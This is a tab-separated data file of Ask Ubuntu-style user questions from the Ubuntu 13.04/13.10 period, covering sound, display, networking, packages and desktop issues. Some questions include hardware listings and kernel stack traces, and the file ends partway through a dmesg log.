361384	sound card not detected in 13.04	i have a problem with my sound card . i do n't have volume up or down option anywhere . in the setting - > sound i do n't have any card detected . but when i run the command sudo aplay -l , i get the following output **** list of playback hardware devices **** failed to create secure directory ( /home/ganessh/.config/pulse ) : permission denied card 0 : mid [ hda intel mid ] , device 0 : stac92xx analog [ stac92xx analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 7 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 8 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 9 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 and the command lspci -v | grep -a7 -i `` audio '' outputs 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) subsystem : dell device 02a2 flags : bus master , fast devsel , latency 0 , irq 48 memory at f0f20000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) ( prog-if 00 [ normal decode ] ) -- 02:00.1 audio device : nvidia corporation gf106 high definition audio controller ( rev a1 ) subsystem : dell device 02a2 flags : bus master , fast devsel , latency 0 , irq 17 memory at d3efc000 ( 32-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 07:00.0 network controller : intel corporation ultimate n wifi link 5300 so , i assume that the drivers are properly installed but still i do n't get any option in the settings or volume control . the same card used to work well back in 2010 versions ( 04 and 10 ) edit 1 : so the device drivers are properly installed . i was using ntfs file system as my home directory ( so i use my files across os ) . there is a folder called ~/.config/pulse which was not be set as secured folder by ubuntu . so the process to access it was failing and my sound card was not available to me for use . changed my home directory to ext4 and everythin works perfectly .
361390	what extension for uploading drawings from gimp to facebook	today i upgraded to ubuntu 13.10 from 13.04 . it looks good . i did n't test gimp image editor on the 13.04 version but i just tested the 13.10 version with a painting with gimp and when i tried to upload the file to facebook it tells me that this is an invalid image . i have an older laptop with ubuntu 12.04 and have the same gimp installed in it . with the 12.04 version i have plenty of extensions for filing the images that i do on gimp and can upload them to facebook . i noticed that the 13.10 version has only a few extensions for saving a file from gimp . which extension should i use to save a file that facebook will accept in this 13.10 version ?
361391	files : name column basically useless in list view . feature or bug ?	so the following is happening in files whenever the width of the window is somewhat smaller than all the content of the list : in list view the name column is cropped unto a point where no name is visible at all ! and it is even not possible to change the column size manually . funnily , in some situations it quickly flickers from a larger column width to the small one back and forth before settling on the small size . unnecessarily to say , it is extremely annoying . is there a way around this or is this just `` bad design '' ? oh yeah , ubuntu 13.04 & 13.10 , files version 3.8.2 .
361392	does cinnamon 2.0 really break your 13.10 desktop ?	i was reading an article that warns not to use cinnamon 2.0 on ubuntu 13.10 or it will break . is this true ? this is the article . http : //news.softpedia.com/news/cinnamon-2-0-corrupts-unity-on-ubuntu-13-10-390736.shtml
361395	ca n't shut down or restart ubuntu 13.10 after upgrading	i upgraded from 13.04 to 13.10 last night and now ca n't seem to get 13.10 to shutdown or restart . it just hangs at a black screen with a cursor . any ideas ?
361398	gedit-developer-plugins on ubuntu 13.10 saucy salamander	i 've installed gedit-developer-plugins on a fresh ubuntu 13.10 saucy salamander i 've lauched gedit ( from the terminal ) but when i turn a gdp plugin on ( in this case gdp find ) i get the following error : ( gedit:3640 ) : libpeas-warning ** : could not find loader 'python ' for plugin 'gdpfind' the same error only shows while turning on gdp plugins , the others work well . any solution to make this plugins work again ?
361405	i ca n't change keyboard layout ubuntu 13.10	i ve just installed ubuntu 13.10 and i 've installed my local language keyboard and i ca n't find a way to simply change from one to another for example with the `` traditional '' keys alt+shift !
361407	gnome panel items	testing out gnome to see if it may be better for me . i am used to using unity on 13.04 by now but i tried to install gnome and get used to that and see how it goes . i am trying to get notification items , like pidgin , rhythmbox , keepass2 , ect , to the notifications area like in unity . but i only see settings , battery , wifi , bluetooth , and audio . how do i get my the others to start there .
361410	ubuntu one installation error - w : failed to fetch cdrom : //ubunto 12.04.2 lts_precise	w : failed to fetch cdrom : //ubunto 12.04.2 lts_precise pangolin_-release amd64 ( 20130213 ) /dists/precise/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt.apt-get update cannont be used to add new cd-roms , w : failed to fetch cdrom : //ubuntu 12.04.02 lts_precise pangolin_-release amd64 ( 201302213 ) /dists/precise/restriced binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt.-get update connot be used to add new cd-roms , e : some index files failed to download they have been ignored , or old ones used instead . yes my laptop cd-rom is not working , and i assume that has something to do with this install not working . i do n't want to have to fix my cd-rom drive to get this to install and my bios does not support disabling it ... any idea 's ?
361414	graphic card wont let me install ubuntu	i am new to ubuntu , never used it and wanted to try the new 13.10 , i downloaded the 13.10 x64 version and made and bootable usb drive , after i boot the pc with the drive in and select try ubuntu without installing the thing just freezes and after a while random numbers appear on the screen and after a while it freezes again , this also happened when a while back i tried to install ubuntu 12.10 amd athlon 64 x2 dual core 4400+ 230ghz 4gb ram and ati hd 5450 1gb ddr3 the reason i think its the graphic card is that the words and numbers that pop up while i try to install it say something about gpu and radeon . i tried to remove the card and it works fine but as soon as i plug it in i cant boot the computer .
361416	how to get emu 1212m to work with ubuntu 13.10 ?	i try this method how to get emu 1212m , emu 1616m , or emu 1010 to work with ubuntu 12.10 ? when i configure alsa-driver error occurs : checking for kernel linux/version.h ... no the file /lib/modules/3.11.0-12-generic/build/include/include_version_h does not exist . i try create link : ln -s /usr/src/linux-headers-3.11.0-12-generic/include/generated/uapi/linux/version.h /usr/src/linux-headers-3.11.0-12-generic/include/linux/version.h configure - ok make - many errors : ( cc [ m ] /home/dshubin/tmp/alsa-driver-1.0.25/acore/hwdep.o in file included from /home/dshubin/tmp/alsa-driver-1.0.25/acore/hwdep.c:1:0 : /home/dshubin/tmp/alsa-driver-1.0.25/include/adriver.h:293:0 : warning : `` gfp_dma32 '' redefined [ enabled by default ] # define gfp_dma32 0 /* driver must check for 32-bit address */ ^ in file included from include/linux/kmod.h:22:0 , from include/linux/module.h:13 , from /home/dshubin/tmp/alsa-driver-1.0.25/include/adriver.h:63 , from /home/dshubin/tmp/alsa-driver-1.0.25/acore/hwdep.c:1 : include/linux/gfp.h:154:0 : note : this is the location of the previous definition # define gfp_dma32 __gfp_dma32 ^ in file included from /home/dshubin/tmp/alsa-driver-1.0.25/acore/hwdep.c:1:0 : /home/dshubin/tmp/alsa-driver-1.0.25/include/adriver.h:752:28 : error : static declaration of ‘jiffies_to_msecs’ follows non-static declaration static inline unsigned int jiffies_to_msecs ( const unsigned long j ) ^ in file included from include/linux/ktime.h:25:0 , from include/linux/timer.h:5 , from include/linux/workqueue.h:8 , from include/linux/srcu.h:34 , from include/linux/notifier.h:15 , from include/linux/memory_hotplug.h:6 , from include/linux/mmzone.h:797 , from include/linux/gfp.h:4 , from include/linux/kmod.h:22 , from include/linux/module.h:13 , from /home/dshubin/tmp/alsa-driver-1.0.25/include/adriver.h:63 , from /home/dshubin/tmp/alsa-driver-1.0.25/acore/hwdep.c:1 : include/linux/jiffies.h:295:21 : note : previous declaration of ‘jiffies_to_msecs’ was here extern unsigned int jiffies_to_msecs ( const unsigned long j ) ; ^ ... /home/dshubin/tmp/alsa-driver-1.0.25/acore/hwdep.c:333:2 : error : implicit declaration of function ‘lock_kernel’ [ -werror=implicit-function-declaration ] any ideas ?
361417	gnuplot newest version on ubuntu 12.04	i have gnuplot 4.4 patchlevel 3 on my ubuntu 12.04 lts . i want to upgrade it knowing that a version 4.6 exist . however , when i remove and install it through package manager the installed version is 4.4 . how can i install the latest version ? that problem also pertains to octave . should i upgrade my repositories if so how ? i may need a bit of walkthrough due to my inexperience.thanks for your help in advance .
361422	how can you change the gtk theme and window decorations separately in unity ?	i 'm trying to mix and match a gtk theme with a different window decoration , but i cant see where this can be done . the unity-tweak-tool changes the two in tandem , but this is not necessarily what i want .
361424	what happened to json_encode in 13.10 php ?	just updated to saucy 13.10 and json_encode is missing from the bundled php . json does n't appear in the phpinfo ( ) output and i 'm getting this error in my app : php fatal error : call to undefined function json_encode ( ) anyone else experiencing this or know the fix ?
361425	what is the difference between ubuntu-13.10-desktop-amd64.iso and ubuntu-13.10-desktop-amd64+mac.iso ?	my current assumption is that the mac version has drivers particular to the mac ecosystem ? does that mean that i ca n't create a live system with the non mac iso to boot my mac over usb ?
361426	how to forward local port 80 to another machine ?	i want to port 127:0.0.1:80 to the other machine via ssh , how can i do that ? i tried adding -r 8000 : localhost:80 , but it does n't work . by the way , php is also installed on localhost , maybe that 's why ?
361432	ubuntu 13.10 upgrade application menu not showing applications	i just upgraded to ubuntu 13.10 normally when i click the windows key or press the start button i get an application menu but now it is stuck on the social search or if i press alt-f2 it is the run command . i can only switch between these two . how do i get my app menu back ?
361437	usb mouse running in off mode	so i was using ubuntu normally as i have for the last year or so and i found a really disturbing thing . my mouse has been off ( the switch to turn it off ) its a logitech mouse that has no sensor light on it , so i have no idea if its the switch or what . its been running ( pointing and clicking ) . i 'm wonder if this is a glitch in ubuntu or has other os having this `` glitch '' /hardware malfunction .
361441	subwoofer does n't work on dell inspiron 17r after upgrade to 13.10	after upgrading from 13.04 to 13.10 dell 's inspirion 17r subwoofer stoped working . in ubuntu 13.04 was workaround by adding in the file /etc/modprobe.d/alsa-base.conf next line : options snd-hda-intel model=ref this issue was discussed here : how to activate subwoofer in inspiron 17r ? after update previous workarounds do n't help and i get no sound from any speaker in this case . is there some other fix for the latest version ?
361442	alsa mutes incorrect audio device on headphone event	i know what the problem is , i just do n't know how to prevent it . when i plug in my headphones , alsa automatically mutes ( and sets the volume to 0 ) the 'speaker ' entry in alsamixer . if i go in and manually unmute ( and turn the volume up ) i have sound from my headphones . question is , how do i change this behavior ? i want it to adjust the volume to half , but not mute or set the volume to 0 . i 'm using ubuntu gnome 13.04 output of amixer scontents simple mixer control 'iec958',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ on ] this answer solved my issue : how can i get sound on headphones without switching back to 'speakers ' manually ?
361445	ubuntu 13.10 asus r552jv - cn195h external subwoofer not working	i installed ubuntu 13.10 on my laptop asus r552jv - cn195h alongside windows 8. on windows external subwoofer to this laptop is working but ubuntu doesnt recognize it ( there is no sound from subwoofer ) . i searched for solution and i found some ( no sound from external subwoofer `` sonic master '' on an asus n76vm , https : //wiki.archlinux.org/index.php/asus_n55sf , n56vz : subwoofer not working anymore ) , but it was for other asus laptop series . i tried them , but it didnt work for me . in sound preferences , there is no option for 2.1 sound . if someone could help me , i would be thankfull : )
361446	associating file types in ubuntu 13.10	i just upgraded from ubuntu 13.04 to the latest release , saucy-salamander , also known as ubuntu 13.10 . i am facing problems with associating file types to applications . instead of the traditional applications list that all the other versions of ubuntu offered when a person is trying to associate a file to an application , ubuntu 13.10 is giving me an option to search to the application executable.. which is rather frustrating . how do i activate the old and traditional method whereby i have to chose an application directly without hunting down through the system for the executable ... ? ?
361449	losing wired connection after upgrading to 13.10	nothing much to say . after upgrading from 13.04 , ubuntu/kubuntu holds a wired connection for a few seconds and then drops it . i can untick `` enable networking '' on the network management tray icon and then tick it again to have the connection back for a few seconds . that 's what i 'm doing right now to submit this question . sudo lshw -c network *-network description : ethernet interface product : 88e8001 gigabit ethernet controller vendor : marvell technology group ltd. physical id : 14 bus info : pci @ 0000:02:14.0 logical name : eth0 version : 13 serial : 00:15 : f2 : af : bd:44 size : 1gbit/s capacity : 1gbit/s width : 32 bits clock : 66mhz capabilities : pm vpd bus_master cap_list rom ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=skge driverversion=1.14 duplex=full ip=192.168.1.101 latency=64 link=yes maxlatency=31 mingnt=23 multicast=yes port=twisted pair speed=1gbit/s resources : irq:21 memory : cede4000-cede7fff ioport : c400 ( size=256 ) memory : cedc0000-ceddffff apt-cache policy network-manager network-manager : installato : 0.9.8.0-0ubuntu22 candidato : 0.9.8.0-0ubuntu22 tabella versione : *** 0.9.8.0-0ubuntu22 0 500 http : //it.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages 100 /var/lib/dpkg/status dmesg relevant stuff [ 6633.242742 ] skge 0000:02:14.0 eth0 : disabling interface [ 6634.485208 ] skge 0000:02:14.0 eth0 : enabling interface [ 6636.924409 ] skge 0000:02:14.0 eth0 : link is up at 1000 mbps , full duplex , flow control both [ 6665.947766 ] skge 0000:02:14.0 eth0 : disabling interface [ 6666.400297 ] skge 0000:02:14.0 eth0 : enabling interface [ 6669.122046 ] skge 0000:02:14.0 eth0 : link is up at 1000 mbps , full duplex , flow control both [ 6789.995899 ] skge 0000:02:14.0 eth0 : disabling interface [ 6790.690512 ] skge 0000:02:14.0 eth0 : enabling interface [ 6793.140683 ] skge 0000:02:14.0 eth0 : link is up at 1000 mbps , full duplex , flow control both [ 6838.467165 ] skge 0000:02:14.0 eth0 : disabling interface [ 6839.413877 ] skge 0000:02:14.0 eth0 : enabling interface [ 6841.878607 ] skge 0000:02:14.0 eth0 : link is up at 1000 mbps , full duplex , flow control both [ 6955.304511 ] eth0 : hw csum failure [ 6955.304530 ] cpu : 0 pid : 3 comm : ksoftirqd/0 tainted : pf o 3.11.0-12-generic # 19-ubuntu [ 6955.304535 ] hardware name : system manufacturer system product name/a8r-mvp , bios 0605 12/09/2008 [ 6955.304540 ] ffff880135cff162 ffff880139b139e8 ffffffff816e547a ffff880134d66000 [ 6955.304550 ] ffff880139b13a00 ffffffff815ec43a ffff88007f724900 ffff880139b13a20 [ 6955.304557 ] ffffffff815e5422 0000000000000246 ffff88007f724900 ffff880139b13a30 [ 6955.304565 ] call trace : [ 6955.304582 ] [ < ffffffff816e547a > ] dump_stack+0x45/0x56 [ 6955.304593 ] [ < ffffffff815ec43a > ] netdev_rx_csum_fault+0x3a/0x40 [ 6955.304601 ] [ < ffffffff815e5422 > ] __skb_checksum_complete_head+0x62/0x70 [ 6955.304607 ] [ < ffffffff815e5441 > ] __skb_checksum_complete+0x11/0x20 [ 6955.304618 ] [ < ffffffff8167100c > ] nf_ip_checksum+0xcc/0x100 [ 6955.304642 ] [ < ffffffffa0d1c8c2 > ] tcp_error+0x1b2/0x260 [ nf_conntrack ] [ 6955.304650 ] [ < ffffffff816646e6 > ] ? fib_table_lookup+0x2e6/0x390 [ 6955.304665 ] [ < ffffffffa0d183de > ] nf_conntrack_in+0xee/0xad0 [ nf_conntrack ] [ 6955.304676 ] [ < ffffffff8135ba9e > ] ? cpumask_next_and+0x2e/0x40 [ 6955.304684 ] [ < ffffffff8135ba9e > ] ? cpumask_next_and+0x2e/0x40 [ 6955.304691 ] [ < ffffffff8135ba9e > ] ? cpumask_next_and+0x2e/0x40 [ 6955.304701 ] [ < ffffffffa0d632f1 > ] ipv4_conntrack_in+0x21/0x30 [ nf_conntrack_ipv4 ] [ 6955.304708 ] [ < ffffffff8161cb5b > ] nf_iterate+0x8b/0xa0 [ 6955.304716 ] [ < ffffffff81623030 > ] ? inet_del_offload+0x40/0x40 [ 6955.304722 ] [ < ffffffff8161cbe4 > ] nf_hook_slow+0x74/0x130 [ 6955.304729 ] [ < ffffffff81623030 > ] ? inet_del_offload+0x40/0x40 [ 6955.304737 ] [ < ffffffff81623a74 > ] ip_rcv+0x344/0x380 [ 6955.304744 ] [ < ffffffff815eec66 > ] __netif_receive_skb_core+0x646/0x830 [ 6955.304750 ] [ < ffffffff815eee68 > ] __netif_receive_skb+0x18/0x60 [ 6955.304756 ] [ < ffffffff815eeed3 > ] netif_receive_skb+0x23/0x90 [ 6955.304762 ] [ < ffffffff815ef940 > ] napi_gro_receive+0x80/0xb0 [ 6955.304787 ] [ < ffffffffa002e2e6 > ] skge_poll+0x3a6/0x870 [ skge ] [ 6955.304796 ] [ < ffffffff8101a395 > ] ? native_sched_clock+0x15/0x80 [ 6955.304802 ] [ < ffffffff815ef20c > ] net_rx_action+0x11c/0x240 [ 6955.304811 ] [ < ffffffff81067397 > ] __do_softirq+0xf7/0x240 [ 6955.304817 ] [ < ffffffff81067510 > ] run_ksoftirqd+0x30/0x50 [ 6955.304827 ] [ < ffffffff8108cadf > ] smpboot_thread_fn+0xff/0x1a0 [ 6955.304834 ] [ < ffffffff8108c9e0 > ] ? lg_global_unlock+0x60/0x60 [ 6955.304844 ] [ < ffffffff810847b0 > ] kthread+0xc0/0xd0 [ 6955.304851 ] [ < ffffffff810846f0 > ] ? kthread_create_on_node+0x120/0x120 [ 6955.304859 ] [ < ffffffff816f516c > ] ret_from_fork+0x7c/0xb0 [ 6955.304867 ] [ < ffffffff810846f0 > ] ? kthread_create_on_node+0x120/0x120 [ 6960.694250 ] eth0 : hw csum failure [ 6960.694268 ] cpu : 0 pid : 0 comm : swapper/0 tainted : pf o 3.11.0-12-generic # 19-ubuntu [ 6960.694274 ] hardware name : system manufacturer system product name/a8r-mvp , bios 0605 12/09/2008 [ 6960.694279 ] ffff8801357575e2 ffff88013fc03af0 ffffffff816e547a ffff880134d66000 [ 6960.694288 ] ffff88013fc03b08 ffffffff815ec43a ffff880134a09b00 ffff88013fc03b28 [ 6960.694295 ] ffffffff815e5422 000000003fc03b70 ffff880134a09b00 ffff88013fc03b38 [ 6960.694303 ] call trace : [ 6960.694307 ] < irq > [ < ffffffff816e547a > ] dump_stack+0x45/0x56 [ 6960.694331 ] [ < ffffffff815ec43a > ] netdev_rx_csum_fault+0x3a/0x40 [ 6960.694339 ] [ < ffffffff815e5422 > ] __skb_checksum_complete_head+0x62/0x70 [ 6960.694346 ] [ < ffffffff815e5441 > ] __skb_checksum_complete+0x11/0x20 [ 6960.694356 ] [ < ffffffff8167100c > ] nf_ip_checksum+0xcc/0x100 [ 6960.694380 ] [ < ffffffffa0d1c8c2 > ] tcp_error+0x1b2/0x260 [ nf_conntrack ] [ 6960.694387 ] [ < ffffffff815f0a28 > ] ? dev_hard_start_xmit+0x318/0x570 [ 6960.694403 ] [ < ffffffffa0d183de > ] nf_conntrack_in+0xee/0xad0 [ nf_conntrack ] [ 6960.694412 ] [ < ffffffff8109edfe > ] ? update_group_power+0x13e/0x220 [ 6960.694422 ] [ < ffffffff8135ba9e > ] ? cpumask_next_and+0x2e/0x40 [ 6960.694432 ] [ < ffffffffa0d632f1 > ] ipv4_conntrack_in+0x21/0x30 [ nf_conntrack_ipv4 ] [ 6960.694439 ] [ < ffffffff8161cb5b > ] nf_iterate+0x8b/0xa0 [ 6960.694448 ] [ < ffffffff81623030 > ] ? inet_del_offload+0x40/0x40 [ 6960.694454 ] [ < ffffffff8161cbe4 > ] nf_hook_slow+0x74/0x130 [ 6960.694461 ] [ < ffffffff81623030 > ] ? inet_del_offload+0x40/0x40 [ 6960.694468 ] [ < ffffffff81623a74 > ] ip_rcv+0x344/0x380 [ 6960.694475 ] [ < ffffffff815eec66 > ] __netif_receive_skb_core+0x646/0x830 [ 6960.694481 ] [ < ffffffff815eee68 > ] __netif_receive_skb+0x18/0x60 [ 6960.694487 ] [ < ffffffff815eeed3 > ] netif_receive_skb+0x23/0x90 [ 6960.694493 ] [ < ffffffff815ef940 > ] napi_gro_receive+0x80/0xb0 [ 6960.694518 ] [ < ffffffffa002e2e6 > ] skge_poll+0x3a6/0x870 [ skge ] [ 6960.694525 ] [ < ffffffff815ef20c > ] net_rx_action+0x11c/0x240 [ 6960.694533 ] [ < ffffffff81067397 > ] __do_softirq+0xf7/0x240 [ 6960.694539 ] [ < ffffffff81067675 > ] irq_exit+0xb5/0xc0 [ 6960.694548 ] [ < ffffffff816f7516 > ] do_irq+0x56/0xc0 [ 6960.694555 ] [ < ffffffff816ecb2d > ] common_interrupt+0x6d/0x6d [ 6960.694559 ] < eoi > [ < ffffffff8104d386 > ] ? native_safe_halt+0x6/0x10 [ 6960.694574 ] [ < ffffffff8101b22f > ] default_idle+0x1f/0xc0 [ 6960.694581 ] [ < ffffffff8101baf6 > ] arch_cpu_idle+0x26/0x30 [ 6960.694590 ] [ < ffffffff810b54ee > ] cpu_startup_entry+0xce/0x280 [ 6960.694598 ] [ < ffffffff816d4727 > ] rest_init+0x77/0x80 [ 6960.694607 ] [ < ffffffff81d26ef7 > ] start_kernel+0x40a/0x416 [ 6960.694615 ] [ < ffffffff81d268f6 > ] ? repair_env_string+0x5c/0x5c [ 6960.694622 ] [ < ffffffff81d26120 > ] ? early_idt_handlers+0x120/0x120 [ 6960.694629 ] [ < ffffffff81d265de > ] x86_64_start_reservations+0x2a/0x2c [ 6960.694636 ] [ < ffffffff81d266e8 > ] x86_64_start_kernel+0x108/0x117 [ 6982.043414 ] skge 0000:02:14.0 eth0 : disabling interface [ 6982.149933 ] skge 0000:02:14.0 eth0 : enabling interface [ 6985.178432 ] skge 0000:02:14.0 eth0 : link is up at 1000 mbps , full duplex , flow control both [ 7195.764345 ] skge 0000:02:14.0 eth0 : disabling interface [ 7195.884590 ] skge 0000:02:14.0 eth0 : enabling interface [ 7198.898305 ] skge 0000:02:14.0 eth0 : link is up at 1000 mbps , full duplex , flow control both [ 7883.869895 ] eth0 : hw csum failure [ 7883.869913 ] cpu : 0 pid : 0 comm : swapper/0 tainted : pf o 3.11.0-12-generic # 19-ubuntu [ 7883.869918 ] hardware name : system manufacturer system product name/a8r-mvp , bios 0605 12/09/2008 [ 7883.869924 ] ffff88004cd96a62 ffff88013fc03af0 ffffffff816e547a ffff880134d66000 [ 7883.869933 ] ffff88013fc03b08 ffffffff815ec43a ffff880136885000 ffff88013fc03b28 [ 7883.869940 ] ffffffff815e5422 0000000000000000 ffff880136885000 ffff88013fc03b38 [ 7883.869948 ] call trace : [ 7883.869953 ] < irq > [ < ffffffff816e547a > ] dump_stack+0x45/0x56 [ 7883.869977 ] [ < ffffffff815ec43a > ] netdev_rx_csum_fault+0x3a/0x40 [ 7883.869985 ] [ < ffffffff815e5422 > ] __skb_checksum_complete_head+0x62/0x70 [ 7883.869992 ] [ < ffffffff815e5441 > ] __skb_checksum_complete+0x11/0x20 [ 7883.870002 ] [ < ffffffff8167100c > ] nf_ip_checksum+0xcc/0x100 [ 7883.870027 ] [ < ffffffffa0d1c8c2 > ] tcp_error+0x1b2/0x260 [ nf_conntrack ] [ 7883.870036 ] [ < ffffffffa0d779f4 > ] ? __nfqnl_enqueue_packet+0x104/0x160 [ nfnetlink_queue ] [ 7883.870051 ] [ < ffffffffa0d183de > ] nf_conntrack_in+0xee/0xad0 [ nf_conntrack ] [ 7883.870062 ] [ < ffffffff81626640 > ] ? ip_forward_options+0x1c0/0x1c0 [ 7883.870068 ] [ < ffffffff8161cc22 > ] ? nf_hook_slow+0xb2/0x130 [ 7883.870075 ] [ < ffffffff81626640 > ] ? ip_forward_options+0x1c0/0x1c0 [ 7883.870084 ] [ < ffffffffa0d632f1 > ] ipv4_conntrack_in+0x21/0x30 [ nf_conntrack_ipv4 ] [ 7883.870090 ] [ < ffffffff8161cb5b > ] nf_iterate+0x8b/0xa0 [ 7883.870098 ] [ < ffffffff81623030 > ] ? inet_del_offload+0x40/0x40 [ 7883.870104 ] [ < ffffffff8161cbe4 > ] nf_hook_slow+0x74/0x130 [ 7883.870111 ] [ < ffffffff81623030 > ] ? inet_del_offload+0x40/0x40 [ 7883.870118 ] [ < ffffffff81623a74 > ] ip_rcv+0x344/0x380 [ 7883.870125 ] [ < ffffffff815eec66 > ] __netif_receive_skb_core+0x646/0x830 [ 7883.870131 ] [ < ffffffff815eee68 > ] __netif_receive_skb+0x18/0x60 [ 7883.870137 ] [ < ffffffff815eeed3 > ] netif_receive_skb+0x23/0x90 [ 7883.870144 ] [ < ffffffff815ef940 > ] napi_gro_receive+0x80/0xb0 [ 7883.870168 ] [ < ffffffffa002e2e6 > ] skge_poll+0x3a6/0x870 [ skge ] [ 7883.870174 ] [ < ffffffff815ef20c > ] net_rx_action+0x11c/0x240 [ 7883.870182 ] [ < ffffffff81067397 > ] __do_softirq+0xf7/0x240 [ 7883.870189 ] [ < ffffffff81067675 > ] irq_exit+0xb5/0xc0 [ 7883.870197 ] [ < ffffffff816f7516 > ] do_irq+0x56/0xc0 [ 7883.870205 ] [ < ffffffff816ecb2d > ] common_interrupt+0x6d/0x6d [ 7883.870208 ] < eoi > [ < ffffffff8104d386 > ] ? native_safe_halt+0x6/0x10 [ 7883.870223 ] [ < ffffffff8101b22f > ] default_idle+0x1f/0xc0 [ 7883.870229 ] [ < ffffffff8101baf6 > ] arch_cpu_idle+0x26/0x30 [ 7883.870238 ] [ < ffffffff810b54ee > ] cpu_startup_entry+0xce/0x280 [ 7883.870246 ] [ < ffffffff816d4727 > ] rest_init+0x77/0x80 [ 7883.870256 ] [ < ffffffff81d26ef7 > ] start_kernel+0x40a/0x416 [ 7883.870264 ] [ < ffffffff81d268f6 > ] ? repair_env_string+0x5c/0x5c [ 7883.870271 ] [ < ffffffff81d26120 > ] ? early_idt_handlers+0x120/0x120 [ 7883.870278 ] [ < ffffffff81d265de > ] x86_64_start_reservations+0x2a/0x2c [ 7883.870286 ] [ < ffffffff81d266e8 > ] x86_64_start_kernel+0x108/0x117 [ 7902.415764 ] skge 0000:02:14.0 eth0 : disabling interface [ 7903.255779 ] skge 0000:02:14.0 eth0 : enabling interface [ 7905.693566 ] skge 0000:02:14.0 eth0 : link is up at 1000 mbps , full duplex , flow control both [ 8019.404373 ] eth0 : hw csum failure [ 8019.404391 ] cpu : 0 pid : 0 comm : swapper/0 tainted : pf o 3.11.0-12-generic # 19-ubuntu [ 8019.404396 ] hardware name : system manufacturer system product name/a8r-mvp , bios 0605 12/09/2008 [ 8019.404401 ] ffff88013748d9e2 ffff88013fc03af0 ffffffff816e547a ffff880134d66000 [ 8019.404411 ] ffff88013fc03b08 ffffffff815ec43a ffff88013598a600 ffff88013fc03b28 [ 8019.404417 ] ffffffff815e5422 00000000383e2f28 ffff88013598a600 ffff88013fc03b38 [ 8019.404425 ] call trace : [ 8019.404430 ] < irq > [ < ffffffff816e547a > ] dump_stack+0x45/0x56 [ 8019.404453 ] [ < ffffffff815ec43a > ] netdev_rx_csum_fault+0x3a/0x40 [ 8019.404462 ] [ < ffffffff815e5422 > ] __skb_checksum_complete_head+0x62/0x70 [ 8019.404468 ] [ < ffffffff815e5441 > ] __skb_checksum_complete+0x11/0x20 [ 8019.404478 ] [ < ffffffff8167100c > ] nf_ip_checksum+0xcc/0x100 [ 8019.404504 ] [ < ffffffffa0d1c8c2 > ] tcp_error+0x1b2/0x260 [ nf_conntrack ] [ 8019.404513 ] [ < ffffffff8101a395 > ] ? native_sched_clock+0x15/0x80 [ 8019.404522 ] [ < ffffffff81091b28 > ] ? resched_task+0x28/0x80 [ 8019.404537 ] [ < ffffffffa0d183de > ] nf_conntrack_in+0xee/0xad0 [ nf_conntrack ] [ 8019.404544 ] [ < ffffffff810925c5 > ] ? check_preempt_curr+0x85/0xa0 [ 8019.404554 ] [ < ffffffff8104dee9 > ] ? default_spin_lock_flags+0x9/0x10 [ 8019.404562 ] [ < ffffffff8109484a > ] ? try_to_wake_up+0x20a/0x2b0 [ 8019.404572 ] [ < ffffffffa0d632f1 > ] ipv4_conntrack_in+0x21/0x30 [ nf_conntrack_ipv4 ] [ 8019.404580 ] [ < ffffffff8161cb5b > ] nf_iterate+0x8b/0xa0 [ 8019.404588 ] [ < ffffffff81623030 > ] ? inet_del_offload+0x40/0x40 [ 8019.404594 ] [ < ffffffff8161cbe4 > ] nf_hook_slow+0x74/0x130 [ 8019.404601 ] [ < ffffffff81623030 > ] ? inet_del_offload+0x40/0x40 [ 8019.404608 ] [ < ffffffff81623a74 > ] ip_rcv+0x344/0x380 [ 8019.404615 ] [ < ffffffff815eec66 > ] __netif_receive_skb_core+0x646/0x830 [ 8019.404621 ] [ < ffffffff815eee68 > ] __netif_receive_skb+0x18/0x60 [ 8019.404627 ] [ < ffffffff815eeed3 > ] netif_receive_skb+0x23/0x90 [ 8019.404633 ] [ < ffffffff815ef940 > ] napi_gro_receive+0x80/0xb0 [ 8019.404659 ] [ < ffffffffa002e2e6 > ] skge_poll+0x3a6/0x870 [ skge ] [ 8019.404665 ] [ < ffffffff815ef20c > ] net_rx_action+0x11c/0x240 [ 8019.404673 ] [ < ffffffff81067397 > ] __do_softirq+0xf7/0x240 [ 8019.404679 ] [ < ffffffff81067675 > ] irq_exit+0xb5/0xc0 [ 8019.404687 ] [ < ffffffff816f7516 > ] do_irq+0x56/0xc0 [ 8019.404695 ] [ < ffffffff816ecb2d > ] common_interrupt+0x6d/0x6d [ 8019.404698 ] < eoi > [ < ffffffff8104d386 > ] ? native_safe_halt+0x6/0x10 [ 8019.404711 ] [ < ffffffff8101b22f > ] default_idle+0x1f/0xc0 [ 8019.404717 ] [ < ffffffff8101baf6 > ] arch_cpu_idle+0x26/0x30 [ 8019.404726 ] [ < ffffffff810b54ee > ] cpu_startup_entry+0xce/0x280 [ 8019.404734 ] [ < ffffffff816d4727 > ] rest_init+0x77/0x80 [ 8019.404743 ] [ < ffffffff81d26ef7 > ] start_kernel+0x40a/0x416 [ 8019.404751 ] [ < ffffffff81d268f6 > ] ? repair_env_string+0x5c/0x5c [ 8019.404758 ] [ < ffffffff81d26120 > ] ? early_idt_handlers+0x120/0x120 [ 8019.404765 ] [ < ffffffff81d265de > ] x86_64_start_reservations+0x2a/0x2c [ 8019.404772 ] [ < ffffffff81d266e8 > ] x86_64_start_kernel+0x108/0x117 [ 8040.634295 ] eth0 : hw csum failure [ 8040.634314 ] 